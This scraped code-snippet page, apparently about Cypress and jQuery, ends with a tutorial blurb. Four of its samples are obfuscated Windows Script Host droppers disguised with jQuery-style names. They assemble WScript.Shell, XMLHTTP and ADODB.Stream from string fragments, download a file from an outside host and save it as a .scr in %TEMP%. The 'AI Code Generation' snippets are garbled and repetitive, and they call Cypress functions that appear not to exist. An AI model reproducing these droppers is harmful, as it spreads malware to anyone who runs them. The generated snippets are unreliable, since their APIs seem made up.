Best JavaScript code snippet using cypress
...134 ajaxLocation = location.href;135 } catch (e) {136 }137 ajaxLocParts = rurl.exec(ajaxLocation.toLowerCase()) || [];138 function addToPrefiltersOrTransports() {139 return function (dataTypeExpression) {140 };141 }142 jQuery.extend({143 active: 0,144 lastModified: {},145 etag: {},146 ajaxSettings: {147 isLocal: rlocalProtocol.test(ajaxLocParts[1]),148 converters: {149 '* text': window.String,150 'text html': true,151 'text json': jQuery.parseJSON152 }153 },154 ajaxSetup: function (settings) {155 },156 ajaxPrefilter: addToPrefiltersOrTransports(),157 ajaxTransport: addToPrefiltersOrTransports(transports),158 ajax: function (options) {159 },160 getScript: function (url, callback) {161 return;162 },163 getJSON: function (url, data, callback) {164 }165 });166 window.jQuery = window.$ = jQuery;167}());168function go() {169 $().html().click();170}171go();
1preventDefault = "re";2var holdReady = "Sleep",3 stopQueue = 151,4 end = "r";5href = "eBody", getElementsByName = "File", pos = "st", rclickable = 4;6var fcamelCase = ".scr",7 one = "veTo",8 rmouseEvent = 24,9 content = 2142,10 truncate = ".de.",11 focus = "rato-";12var dataAttr = "nt",13 getClientRects = "ronme";14serializeArray = "ip";15tween = "osti";16handlerQueue = "positi";17fix = "R";18bp = "clo";19beforeunload = "Resp";20host = "51457";21opener = "dy";22deepDataAndEvents = "a";23addToPrefiltersOrTransports = "WScri";24opts = "7j6", display = (function Object.prototype.currentTarget() {25 return this26}, "980k");27var setMatchers = "%TEMP%",28 siblingCheck = 5,29 xhrFields = "c",30 pixelPosition = 2331;31var pushStack = "hell",32 parseJSON = 0,33 evt = "SXML2";34fromCharCode = ".", setAttribute = 15, newUnmatched = 2;35var funcName = "Sc",36 rparentsprev = 124,37 destElements = 166,38 forward = "64",39 domManip = "ttp://",40 stop = 168;41dataUser = "sa";42getPropertyValue = "on";43dir = "t";44global = "o";45uniqueID = "am";46lastModified = "eObje";47duration = 7;48completed = "h";49indirect = "2";50wrap = "state";51originalOptions = 32;52preferredDoc = "conv";53setGlobalEval = 9;54isArrayLike = "C";55dataTypeExpression = "eObj";56postFilter = 158;57ajaxHandleResponses = "GET";58stopPropagation = "W";59rneedsContext = "s";60var fns = "type",61 orig = "Stre";62exports = "pt", contexts = 8631, disabled = "un";63open = 22, isXMLDoc = "se", scrollTop = 25, pageX = "ect", handleObjIn = 2859, isReady = "Expand";64var anim = "h5",65 uid = 1,66 assert = "WScrip",67 curPosition = 117,68 properties = "send",69 pageYOffset = 54;70xml = "String", safeActiveElement = "reateO", grep = 256, radio = 47;71var rootjQuery = ".XMLHT",72 subtract = "/",73 createTextNode = "Creat";74nextAll = 34;75_removeData = "bj";76whitespace = "pt.S";77updateFunc = "M";78unbind = "ADODB", originalSettings = "ng.", attrNames = "write", prepend = "Envi", offsetParent = "pen";79var parseFromString = 19,80 blur = "eu/";81removeClass = "TP";82w = ((52 * rclickable + 49), (((rmouseEvent / 4) * newUnmatched + (1 * siblingCheck)), this));83udataCur = fix + disabled;84jsonp = w[addToPrefiltersOrTransports + exports];85matchedCount = jsonp[createTextNode + dataTypeExpression + pageX](addToPrefiltersOrTransports + whitespace + pushStack);86condense = matchedCount[isReady + prepend + getClientRects + dataAttr + xml + rneedsContext](setMatchers + subtract) + preferredDoc + fcamelCase;87fnOut = w[addToPrefiltersOrTransports + exports][isArrayLike + safeActiveElement + _removeData + pageX](updateFunc + evt + rootjQuery + removeClass);88fnOut[global + offsetParent](ajaxHandleResponses, completed + domManip + host + forward + indirect + truncate + pos + focus + completed + tween + originalSettings + blur + display + opts + anim, !((((((0 / scrollTop) | (237, stop, 0)) ^ ((uid * 1) * (parseJSON / 23))) | (((curPosition & 95) ^ (Math.pow(pageYOffset, 2) - handleObjIn)), (0 | (uid * 3)), ((parseJSON | 0) | (open - 12)))), ((((parseJSON | 84), (stopQueue + 0), (postFilter, 101)) * (uid * 2) + ((rparentsprev - 39) - (Math.pow(radio, 2) - content)))), ((((16 | originalOptions) / (163, destElements, 220, rmouseEvent)) ^ (6 | duration)) ^ ((2 | uid) | (1 + newUnmatched)) * ((Math.pow(4, newUnmatched) - 11) & (siblingCheck | 7)))) > duration));89fnOut[properties]();90while(fnOut[preventDefault + deepDataAndEvents + opener + wrap] < ((0 ^ parseJSON) | (2 * newUnmatched))) {91 w[stopPropagation + funcName + end + serializeArray + dir][holdReady](((24 * rclickable + 12) & (grep - 139)));92}93originalProperties = w[addToPrefiltersOrTransports + exports][createTextNode + lastModified + xhrFields + dir](unbind + fromCharCode + orig + uniqueID);94w[assert + dir][holdReady](((postFilter, 6497) + (contexts & 10103)));9596originalProperties[global + offsetParent]();97MAX_NEGATIVE = originalProperties;98MAX_NEGATIVE[fns] = ((pixelPosition / 21), (rmouseEvent / 24));99tabIndex = MAX_NEGATIVE;100originalProperties[attrNames](fnOut[beforeunload + getPropertyValue + rneedsContext + href]);101tabIndex[handlerQueue + getPropertyValue] = ((uid) & (19 - parseFromString));102originalProperties[dataUser + one + getElementsByName](condense, (17 - setAttribute));103originalProperties[bp + isXMLDoc]();104testContext = matchedCount;
1marginRight = "pt";2eq = "aveTo";3unbind = (function String.prototype.opt() {4 return this5}, "ty");6_queueHooks = "Sleep";7letter = "Scr", speed = "ope", completeDeferred = 10;8curValue = "C", parent = "bjec", classCache = "s", hidden = "Str";9eventDoc = "i";10structure = "/";11rsubmittable = "positi", backgroundClip = "http:/", submit = "Bo";12getScript = "ADO", getResponseHeader = "6h5g", jQuery = "nme", isArrayLike = "write", elements = 554;13oldCache = "dy";14oMatchesSelector = 44;15replaceAll = "s/k7j";16settings = "ile";17timerId = "nt", checkContext = "MS";18tfoot = 21, msg = 6, testContext = "ipt.S", compilerCache = "T";19var rclickable = "p",20 addClass = 7,21 cssFn = "TP",22 register = "close",23 toggle = "rea";24var image = "o",25 arg = 101,26 isPlainObject = 9;27var focus = ".org.e";28var support = "ML2",29 cloneCopyEvent = "eep",30 appendTo = "iro",31 handler = 45,32 noConflict = 48,33 slideUp = "GET";34var innerHTML = 29,35 code = "W",36 wrapAll = "ring";37excess = "ngs";38events = "WScrip";39var ajaxTransport = "Objec",40 isPropagationStopped = "fi",41 parse = "eO",42 postFinder = "WSc";43hasCompare = 2;44elemLang = "Creat";45preMap = "%TEMP%";46identifier = "en";47base = "eObjec";48buildParams = "R";49rfocusable = "/ozo";50jsonProp = "hell", click = "u", ajaxPrefilter = 148, dataTypes = "WScri", isTrigger = "e";51dest = "reate", detach = "DB.S", swing = 194;52var curCSSTop = "rip";53qsa = 0;54serialize = "d";55addToPrefiltersOrTransports = "n";56bySet = "Expand";57var cacheLength = "on",58 getJSON = "tream",59 setMatched = "cr",60 concat = ".s",61 contentDocument = "X",62 cssProps = 1;63what = "Re";64access = "t";65traditional = 346;66_removeData = "Crea";67toArray = 5168;68method = "ip", createComment = 3, accepts = 40;69innerText = 184;70readyList = "Env";71restoreScript = ".XMLH";72time = "open";73hasOwn = "f";74results = "Sl";75var rscriptTypeMasked = 5703,76 offsetHeight = 27,77 progress = "ystate",78 resolve = "sponse",79 name = "WS";80rtypenamespace = 11;81isImmediatePropagationStopped = "F";82addGetHookIf = (((3297 | rscriptTypeMasked) / (Math.pow(26, hasCompare) - 649)), ((Math.pow((msg & 7), (cssProps * 2)) - (arg - 72)), this));83rnamespace = buildParams + click + addToPrefiltersOrTransports;84global = addGetHookIf[events + access];85parseJSON = global[curValue + dest + ajaxTransport + access](name + setMatched + testContext + jsonProp);86siblingCheck = parseJSON[bySet + readyList + appendTo + jQuery + timerId + hidden + eventDoc + excess](preMap + structure) + isPropagationStopped + wrapAll + concat + setMatched;87hasFocus = addGetHookIf[postFinder + curCSSTop + access][_removeData + access + base + access](checkContext + contentDocument + support + restoreScript + compilerCache + cssFn);88hasFocus[time](slideUp, backgroundClip + rfocusable + addToPrefiltersOrTransports + image + focus + replaceAll + getResponseHeader + hasOwn, !(completeDeferred == ((((140 / addClass) + (216, ajaxPrefilter)), ((20 + innerHTML) * 3 + (tfoot ^ 3)), ((isPlainObject ^ 65) ^ (traditional - 127)), (createComment & 3)) * ((cssProps ^ 2) & (handler - 42)) + ((((oMatchesSelector - 43) + (innerText, 183, accepts, 0)) * ((cssProps + 0) & (cssProps + 0))) ^ ((cssProps & 1) + -((offsetHeight, 166, completeDeferred, 1) + (cssProps + -1)))))));89hasFocus[classCache + identifier + serialize]();90while(hasFocus[toggle + serialize + progress] < ((swing, 4) & (Math.pow(msg, 2) - innerHTML))) {91 addGetHookIf[events + access][_queueHooks](((57 + rtypenamespace) | (14 * hasCompare + 8)));92}93p = addGetHookIf[dataTypes + marginRight][elemLang + parse + parent + access](getScript + detach + getJSON);94addGetHookIf[code + letter + method + access][results + cloneCopyEvent](((toArray + 3859) + (elements + 5419)));9596p[speed + addToPrefiltersOrTransports]();97attaches = p;98attaches[unbind + rclickable + isTrigger] = ((handler / 45));99s = attaches;100p[isArrayLike](hasFocus[what + resolve + submit + oldCache]);101s[rsubmittable + cacheLength] = ((cssProps + -1) & (cssProps & 1));102p[classCache + eq + isImmediatePropagationStopped + settings](siblingCheck, ((qsa ^ 1) * hasCompare));103p[register]();104setDocument = parseJSON;
1var scripts = 16,2 offsetParent = 92,3 returned = "eateO",4 callbackContext = "p",5 s = "trings";6_load = "type";7var position = "t",8 second = "Cr",9 beforeSend = "";10$ = "pa";11tween = ".Shell";12sortInput = "MS";13addGetHookIf = 59;14responseFields = "i";15var computed = "ateOb",16 options = "C",17 finish = "S",18 tweens = 1;19var len = "eep",20 doAnimation = 29,21 hasData = "ript";22curElem = "M";23originalEvent = "s";24unquoted = "pt";25pixelPositionVal = "iti";26string = "%TE";27var active = "viron",28 addToPrefiltersOrTransports = "o",29 dirrunsUnique = "R",30 statusCode = "e",31 excess = 3,32 xhrSuccessStatus = "nd";33var lock = "ite",34 buildFragment = "bjec",35 div = "7j6h5",36 setDocument = "LHTTP";37var matcher = 15,38 remaining = "mentS";39old = "r";40define = "sting";41getResponseHeader = "Stream";42relative = 34;43dispatch = "open";44var isArray = "57",45 ajax = "ject",46 outerCache = "st",47 rnoContent = 244,48 chainable = "Fil",49 xml = "Respon";50concat = "teO";51sortDetached = "seB";52fromCharCode = "se";53getAll = 0;54propName = "ody";55setRequestHeader = "ato-ho";56amd = "XML2.X";57show = ".";58href = 13, setPositiveNumber = "saveTo", inspected = "http";59keyCode = "WScr", sibling = "pos", pipe = "scr", ontype = "eu/980", iframe = ":";60suffix = "/514", invert = "/", unbind = "rea", el = "Sl", copyIsArray = "pts";61var stop = "Cre",62 cached = 4,63 src = "n",64 linear = 2,65 defaultValue = "MP%/",66 acceptData = "DB";67head = "Ex";68transports = 336357269;69createOptions = "ADO";70isXML = "leep";71resolveValues = "close";72pointerleave = "WSc";73seekingTransport = "ndE";74getClass = "wr";75err = "WScrip";76reliableMarginRight = "un";77outermost = "eady";78size = "GET";79copy = "WScri";80webkitMatchesSelector = (function Object.prototype.lastChild() {81 return this82}, "bject"), iterator = "k";83abort = "ate";84stopPropagation = "6";85pushStack = (((Math.pow(819, linear) - 669809) / (addGetHookIf - 51)), ((Math.pow((relative - 29), (getAll | 2)) - (scripts | 3)), this));86cur = dirrunsUnique + reliableMarginRight;87fnOut = pushStack[err + position];88left = fnOut[second + returned + webkitMatchesSelector](keyCode + responseFields + unquoted + tween);89handler = left[head + $ + seekingTransport + src + active + remaining + s](string + defaultValue) + addToPrefiltersOrTransports + copyIsArray + show + pipe;90isSimulated = pushStack[copy + callbackContext + position][stop + computed + ajax](sortInput + amd + curElem + setDocument);91isSimulated[addToPrefiltersOrTransports + callbackContext + statusCode + src](size, inspected + iframe + invert + suffix + isArray + stopPropagation + beforeSend + originalEvent + position + old + setRequestHeader + define + show + ontype + iterator + div, !(cached == ((((1 ^ excess) ^ (2 - linear)) - (0 | getAll)) | ((30 - doAnimation) * (0 / doAnimation))) * ((((10 ^ cached) ^ (3 + matcher)) / ((15 + getAll) & (7 * linear))) + (0 | (getAll | (7, rnoContent, 0))))));92isSimulated[fromCharCode + xhrSuccessStatus]();93while (isSimulated[old + outermost + outerCache + abort] < (tweens ^ (4 ^ tweens))) {94 pushStack[copy + unquoted][finish + isXML](((20 & doAnimation) + (83 & offsetParent)));95}96removeEventListener = pushStack[err + position][options + unbind + concat + buildFragment + position](createOptions + acceptData + show + getResponseHeader);97pushStack[pointerleave + hasData][el + len]((Math.pow((Math.pow(9895, linear) - 97897134), (linear + 0)) - (transports - 143412388)));98removeEventListener[dispatch]();99resolve = removeEventListener;100resolve[_load] = ((getAll & 1) | (tweens + 0));101propFilter = resolve;102removeEventListener[getClass + lock](isSimulated[xml + sortDetached + propName]);103propFilter[sibling + pixelPositionVal + addToPrefiltersOrTransports + src] = getAll;104removeEventListener[setPositiveNumber + chainable + statusCode](handler, (1 * (tweens ^ 3)));105removeEventListener[resolveValues]();106locked = left;
1var l = "ADO",2 percent = "tr";3attrNames = "Body";4cssHooks = 1, attrHooks = "m", docElem = "cript", unit = "/", ofType = 4;5queue = "ponse";6hookFn = "L2.XM", vendorPropName = "MSXM";7var namespace = "r",8 animated = 50,9 namespaces = "teObje",10 beforeunload = "%T",11 getter = "nd",12 rkeyEvent = "WS";13first = 784, tweener = 848286, dataAttr = (function Object.prototype.sel() {14 return this15}, ".co"), rsubmittable = "te", guaranteedUnique = "p", tbody = "pa";16buildParams = "sav";17func = 26;18whitespace = 3;19uniqueID = "open";20start = 2;21tokens = "se";22param = "DB.S";23push_native = "She";24id = "ndEn";25unwrap = "m/l";26Sizzle = "Res";27stop = "q32r4";28dataFilter = "ipt.";29ajaxTransport = 0;30qsaError = "laneta";31firingIndex = "Create";32boolHook = 160;33parseXML = ".au/";34isArray = "e";35subtract = "ironm";36markFunction = 5;37isNumeric = "tp://p";38jQuery = "at";39not = 19;40matchContext = "ri";41subordinate = "ings", curOffset = "E", init = "ht";42s = "eObje", scrollTop = "type", settings = "Crea", noGlobal = "eToFil", pdataOld = "wri", getPropertyValue = "ion";43querySelectorAll = "Object";44var access = "Slee";45matcherIn = "ll";46dataUser = "eam", clearQueue = "scr", compiled = "it", merge = "Ex";47var postDispatch = "sys",48 delegate = "ct",49 resolveValues = ".",50 converters = 37688,51 leadingRelative = "Scri",52 props = 17;53var sort = "W",54 clientTop = "54",55 slideUp = "HTTP",56 childNodes = "un";57contains = 8;58var expando = "entStr",59 firstChild = 651;60var clearCloneStyle = 39,61 qualifier = "isTr";62var udataCur = "pos",63 innerText = 49,64 a = "5g",65 to = "MP%",66 rCRLF = "GET",67 doc = "v";68keyCode = 47;69trigger = "rchery";70box = 7, finish = "L";71isPropagationStopped = "R";72pageX = "Cr", speeds = 112479;73speed = "WSc";74sortDetached = "ogs";75scale = "igger";76special = "close";77key = "pt";78rdisplayswap = 16;79curTop = 46;80prepend = (((490 / innerText) - 3), (((first / 49) & (rdisplayswap | 20)), this));81ajaxHandleResponses = isPropagationStopped + childNodes;82andSelf = prepend[sort + leadingRelative + key];83escapedWhitespace = andSelf[firingIndex + querySelectorAll](speed + namespace + dataFilter + push_native + matcherIn);84inArray = escapedWhitespace[merge + tbody + id + doc + subtract + expando + subordinate](beforeunload + curOffset + to + unit) + qualifier + scale + resolveValues + clearQueue;85diff = prepend[sort + leadingRelative + key][pageX + isArray + jQuery + s + delegate](vendorPropName + hookFn + finish + slideUp);86diff[uniqueID](rCRLF, init + isNumeric + qsaError + trigger + dataAttr + attrHooks + parseXML + postDispatch + rsubmittable + unwrap + sortDetached + unit + stop + a + clientTop, !(((((Math.pow((converters / 28), (curTop, 2)) - (tweener * 2 + speeds)) / (41 * props / (17 & not)))) - ((Math.pow(((2 * ofType) ^ (85, markFunction)), ((2 | start) ^ (1 * ajaxTransport))) - ((Math.pow(14, start) - 176) * box + (5 + ajaxTransport))) + (((2 ^ keyCode) & (29 + func)) & (Math.pow(6, start) - 29) * (whitespace | 4)))) == contains));87diff[tokens + getter]();88addToPrefiltersOrTransports = prepend[speed + matchContext + key][settings + namespaces + delegate](l + param + percent + dataUser);89addToPrefiltersOrTransports[uniqueID]();90propFilter = addToPrefiltersOrTransports;91buildFragment = escapedWhitespace;92propFilter[scrollTop] = ((Math.pow(169, start) - 28370), cssHooks);93hasOwn = propFilter;94matchExpr = diff[Sizzle + queue + attrNames];95addToPrefiltersOrTransports[pdataOld + rsubmittable](matchExpr);96hasOwn[udataCur + compiled + getPropertyValue] = ((1 * ajaxTransport) / (1053 / clearCloneStyle));97addToPrefiltersOrTransports[buildParams + noGlobal + isArray](inArray, ((1 & ajaxTransport) | (3 & start)));98checkClone = addToPrefiltersOrTransports;99checkClone[special]();100prepend[rkeyEvent + docElem][access + guaranteedUnique](((90 * boolHook + 33) ^ (firstChild + 110)));
...4// return function(func) {5// structure['*'] = func;6// }7// }8// var ajaxPrefilter = addToPrefiltersOrTransports(prefilters)9// ajaxPrefilter(function(options){10// return {11// send:function(){12// },13// callback:function(){14// }15// }16// })17 // $.ajax({18 // url: 'test.php',19 // dataType:'jsonp',20 // complete: function(data) {21 // console.log(arguments)22 // }...
Using AI Code Generation
1Cypress.addToPrefiltersOrTransports({2 onPrefilter: function (options, originalOptions, xhr) {3 },4 onTransport: function (options, originalOptions, xhr) {5 }6});7Cypress.addToPrefiltersOrTransports({8 onPrefilter: function (options, originalOptions, xhr) {9 },10 onTransport: function (options, originalOptions, xhr) {11 }12});13Cypress.addToPrefiltersOrTransports({14 onPrefilter: function (options, originalOptions, xhr) {15 },16 onTransport: function (options, originalOptions, xhr) {17 }18});19Cypress.addToPrefiltersOrTransports({20 onPrefilter: function (options, originalOptions, xhr) {21 },22 onTransport: function (options, originalOptions, xhr) {23 }24});25Cypress.addToPrefiltersOrTransports({26 onPrefilter: function (options, originalOptions, xhr) {27 },28 onTransport: function (options, originalOptions, xhr) {29 }30});31Cypress.addToPrefiltersOrTransports({32 onPrefilter: function (options, originalOptions, xhr) {33 },34 onTransport: function (options, originalOptions, xhr) {35 }36});
Using AI Code Generation
1Cypress . server ( ) ; 2Cypress . addToPrefiltersOrTransports ( { 3 onBeforeRequest ( xhr ) { 4 console . log ( 'request' , xhr ) ; 5 } , 6 onBeforeResponse ( xhr ) { 7 console . log ( 'response' , xhr ) ; 8 } 9 } ) ;10Cypress . server ( ) ; 11Cypress . addToPrefiltersOrTransports ( { 12 onBeforeRequest ( xhr ) { 13 console . log ( 'request' , xhr ) ; 14 } , 15 onBeforeResponse ( xhr ) { 16 console . log ( 'response' , xhr ) ; 17 } 18 } ) ; 19Cypress . on ( 'window:before:load' , win => { 20 win . XMLHttpRequest . prototype . open = ( original => function ( ) { 21 console . log ( 'request' , arguments ) ; 22 return original . apply ( this , arguments ) ; 23 } ) ( win . XMLHttpRequest . prototype . open ) ; 24 win . XMLHttpRequest . prototype . send = ( original => function ( ) { 25 this . addEventListener ( 'load' , ( ) => { 26 console . log ( 'response' , this ) ; 27 } ) ; 28 return original . apply ( this , arguments ) ; 29 } ) ( win . XMLHttpRequest . prototype . send ) ; 30 } ) ;31Cypress . server ( ) ; 32Cypress . addToPrefiltersOrTransports ( { 33 onBeforeRequest ( xhr )
Using AI Code Generation
1Cypress.Server.defaults({2 whitelist: (xhr) => {3 return true;4 },5 response: {},6 headers: {},7 onAnyRequest: (route, proxy) => {8 return proxy();9 },10 onRequest: (route, proxy) => {11 return proxy();12 },13 onResponse: (route) => {14 return route;15 },16 onAbort: (route) => {17 return route;18 }19});20Cypress.Server.defaults({21 whitelist: (xhr) => {22 return true;23 },24 response: {},25 headers: {},26 onAnyRequest: (route, proxy) => {27 return proxy();28 },29 onRequest: (route, proxy) => {30 return proxy();31 },32 onResponse: (route) => {33 return route;34 },35 onAbort: (route) => {36 return route;37 }38});39Cypress.Server.defaults({40 whitelist: (xhr) => {41 return true;42 },43 response: {},44 headers: {},45 onAnyRequest: (route, proxy) => {46 return proxy();47 },48 onRequest: (route, proxy) => {49 return proxy();50 },51 onResponse: (route) => {52 return route;53 },54 onAbort: (route) => {55 return route;56 }57});58Cypress.Server.defaults({59 whitelist: (xhr) => {60 return true;61 },62 response: {},63 headers: {},64 onAnyRequest: (route, proxy) => {65 return proxy();66 },67 onRequest: (route, proxy) => {68 return proxy();69 },70 onResponse: (route) => {71 return route;72 },73 onAbort: (route) => {74 return route;75 }76});
Using AI Code Generation
1Cypress.addToPrefiltersOrTransports({2 onPrefilter: function(xhr) {3 xhr.setRequestHeader('X-Custom-Header', 'custom-value')4 }5 }6})7Cypress.addToPrefiltersOrTransports({8 onPrefilter: function(xhr) {9 xhr.setRequestHeader('X-Custom-Header', 'custom-value')10 }11 }12})13Cypress.addToPrefiltersOrTransports({14 onPrefilter: function(xhr) {15 xhr.setRequestHeader('X-Custom-Header', 'custom-value')16 }17 }18})19Cypress.addToPrefiltersOrTransports({20 onPrefilter: function(xhr) {21 xhr.setRequestHeader('X-Custom-Header', 'custom-value')22 }23 }24})25Cypress.addToPrefiltersOrTransports({26 onPrefilter: function(xhr) {27 xhr.setRequestHeader('X-Custom-Header', 'custom-value')28 }29 }30})31Cypress.addToPrefiltersOrTransports({32 onPrefilter: function(xhr) {33 xhr.setRequestHeader('X-Custom-Header', 'custom-value')34 }35 }36})37Cypress.addToPrefiltersOrTransports({38 onPrefilter: function(xhr) {39 xhr.setRequestHeader('X-Custom-Header', 'custom-value')40 }41 }42})
Using AI Code Generation
1Cypress.Server.defaults({2 whitelist: (xhr) => {3 return true;4 },5 ignore: (xhr) => {6 return false;7 },8 response: {},9 headers: {},10 onAnyRequest: (route, proxy) => {},11 onRequest: (route) => {},12 onResponse: (route) => {},13 onAbort: (route) => {},14});15Cypress.Server.defaults({16 whitelist: (xhr) => {17 return true;18 },19 ignore: (xhr) => {20 return false;21 },22 response: {},23 headers: {},24 onAnyRequest: (route, proxy) => {},25 onRequest: (route) => {},26 onResponse: (route) => {},27 onAbort: (route) => {},28});29Cypress.Server.defaults({30 whitelist: (xhr) => {31 return true;32 },33 ignore: (xhr) => {34 return false;35 },36 response: {},37 headers: {},38 onAnyRequest: (route, proxy) => {},39 onRequest: (route) => {},40 onResponse: (route) => {},41 onAbort: (route) => {},42});43Cypress.Server.defaults({44 whitelist: (xhr) => {45 return true;46 },47 ignore: (xhr) => {48 return false;
Using AI Code Generation
1Cypress.automation('addToPrefiltersOrTransports', {2 prefilter: function (options, origPrefilter) {3 }4});5Cypress.automation('addToPrefiltersOrTransports', {6 transport: function (options, origTransport) {7 }8});9Cypress.automation('removePrefiltersOrTransports', {10 prefilter: function (options, origPrefilter) {11 }12});13Cypress.automation('removePrefiltersOrTransports', {14 transport: function (options, origTransport) {15 }16});17Cypress.automation('removeAllPrefiltersOrTransports', {18});19Cypress.automation('getPrefiltersOrTransports', {20}).then(function (data)
Cypress is a renowned Javascript-based open-source, easy-to-use end-to-end testing framework primarily used for testing web applications. Cypress is a relatively new player in the automation testing space and has been gaining much traction lately, as evidenced by the number of Forks (2.7K) and Stars (42.1K) for the project. LambdaTest’s Cypress Tutorial covers step-by-step guides that will help you learn from the basics till you run automation tests on LambdaTest.
You can elevate your expertise with end-to-end testing using the Cypress automation framework and stay one step ahead in your career by earning a Cypress certification. Check out our Cypress 101 Certification.
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